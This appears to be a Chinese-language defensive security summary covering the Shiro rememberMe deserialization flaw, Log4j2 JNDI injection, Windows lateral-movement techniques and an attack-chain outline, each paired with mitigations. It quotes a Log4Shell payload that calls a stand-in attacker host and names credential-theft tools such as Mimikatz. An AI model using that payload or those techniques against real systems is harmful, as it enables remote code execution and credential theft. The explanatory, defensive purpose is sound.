网络安全与内存马检测系统

Shiro框架使用AES加密的rememberMe Cookie，但使用了硬编码密钥，攻击者可以构造恶意序列化对象实现远程代码执行。

影响版本：Apache Shiro < 1.2.5

利用条件：目标使用rememberMe功能且密钥泄露

• 检测方法：检查rememberMe Cookie长度是否异常，使用工具检测密钥
• 临时方案：禁用rememberMe功能，升级到最新版本
• 根本方案：使用随机密钥，加强输入验证

Log4j2的JNDI功能未对输入做验证，攻击者通过构造恶意LDAP请求实现远程代码执行。

影响版本：Log4j2 2.0-beta9 - 2.14.1

攻击向量：${jndi:ldap://attacker.com/exp}

• 立即升级到Log4j 2.15.0或更高版本
• 设置log4j2.formatMsgNoLookups=true
• 检查系统异常日志和网络连接
• 使用WAF规则拦截包含jndi:ldap的请求

• 凭证窃取：Mimikatz获取内存密码，SAM数据库提取
• Pass-the-Hash：使用NTLM哈希进行认证
• SMB/WMI利用：通过SMB协议执行命令
• 漏洞利用：MS17-010永恒之蓝等漏洞

• 最小权限原则，网络分段隔离
• 禁用NTLM认证，使用Kerberos
• 定期更新补丁，禁用不必要的服务
• 部署端点检测系统(EDR)

1. 信息收集：扫描网段，识别资产和漏洞
2. 初始入侵：通过Web漏洞或钓鱼攻击获得立足点
3. 权限提升：利用本地漏洞提升到系统权限
4. 横向移动：使用凭证或漏洞在内网扩散
5. 目标达成：窃取数据或部署勒索软件

• 边界防护：WAF、防火墙、IDS/IPS
• 网络分段：限制VLAN间通信
• 权限控制：最小权限原则，双因素认证
• 监控响应：SIEM系统，EDR，威胁情报